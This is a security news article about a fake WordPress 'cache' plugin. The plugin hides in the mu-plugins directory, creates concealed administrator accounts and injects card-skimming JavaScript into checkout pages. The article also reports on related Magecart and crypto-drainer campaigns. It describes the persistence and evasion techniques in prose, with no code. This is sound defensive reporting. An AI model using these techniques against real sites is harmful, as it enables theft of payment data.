Risk Alert: Rogue WordPress Plugin Endangers E-commerce Credit Card Data
A recent threat discovery by vigilant hunters revealed a dangerous rogue WordPress plugin. This plugin possesses the ability to create false administrator users and embed malevolent JavaScript code aimed at extracting sensitive credit card information.
This malicious skimming activity is part of a broader Magecart campaign strategically targeting e-commerce websites, a significant finding highlighted by Sucuri.
Security researcher Ben Martin pointed out, “Similar to other deceptive WordPress plugins, this plugin includes misleading information in its file header to feign authenticity.” Notably, the comments in the code assert its nature as ‘WordPress Cache Addons.’
Typically, these malicious plugins infiltrate WordPress sites either through compromised administrator user accounts or by exploiting security loopholes present in other installed plugins on the site.
Following installation, the plugin replicates itself to the mu-plugins (must-use plugins) directory, automatically activating itself and skillfully concealing its presence from the site’s admin panel.
Martin elaborated, “Since the sole way to eliminate any of the mu-plugins is through manual deletion, the malware takes deliberate measures to prevent this. It does so by unregistering callback functions for hooks that plugins of this nature typically utilize.”
Additionally, this deceitful plugin provides an option to create and hide an administrator user account from the genuine website admin. This strategy aims to avoid detection and maintain sustained access to the target for prolonged periods.
The primary objective of this nefarious campaign is to surreptitiously introduce malware into the checkout pages, facilitating the extraction and transmission of sensitive credit card data to a domain controlled by the malicious actors.
Martin emphasized, “Considering numerous WordPress infections stem from compromised wp-admin administrator users, it’s plausible they’ve been constrained by their access levels. The ability to install plugins remains a significant capability possessed by WordPress admins.”
This disclosure follows recent alerts within the WordPress security community about a phishing campaign misleading users about an unrelated security flaw, thereby coercing them into installing a deceptive plugin disguised as a security patch. Subsequently, this malicious plugin creates an admin user and deploys a web shell for persistent remote access.
Sucuri reported that the threat actors behind this campaign are leveraging the “RESERVED” status linked with a CVE identifier, indicating the yet-to-be-filled details.
Moreover, Sucuri identified another Magecart campaign utilizing the WebSocket communications protocol to inject skimmer code into online storefronts. This nefarious malware activates upon clicking a counterfeit “Complete Order” button overlaid atop the genuine checkout button.
Europol’s recent spotlight report on online fraud underscored digital skimming as a persistent threat, leading to the theft, resale, and misuse of credit card data. The report highlighted a shift from front-end to back-end malware in digital skimming, rendering detection more challenging.
Europol also notified 443 online merchants of compromised credit card or payment card data due to skimming attacks.
Group-IB, collaborating with Europol, identified 23 families of JS-sniffers, including ATMZOW, health_check, FirstKiss, FakeGA, AngryBeaver, Inter, and R3nin, deployed against companies in 17 countries across Europe and the Americas.
The Singapore-based firm added, “As of the end of 2023, a total of 132 JS-sniffer families are known to have compromised websites worldwide.”
Additionally, fake advertisements on Google Search and Twitter for cryptocurrency platforms have been detected, promoting a cryptocurrency drainer named MS Drainer. This drainer has reportedly stolen $58.98 million from 63,210 victims since March 2023 via a network of 10,072 phishing websites.
“By targeting specific audiences through Google search terms and a following base of X, they can select specific targets and launch continuous phishing campaigns at a very low cost,” as stated by ScamSniffer.